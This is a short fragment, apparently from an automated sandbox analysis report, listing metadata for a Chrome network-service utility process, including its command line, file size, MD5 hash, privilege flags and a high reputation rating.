                                                                                      Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2232 --field-trial-handle=2032,i,2302002758345039556,8558399744438251338,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                      Imagebase:0x7ff7f9810000
                                                                                      File size:3'242'272 bytes
                                                                                      MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      No disassembly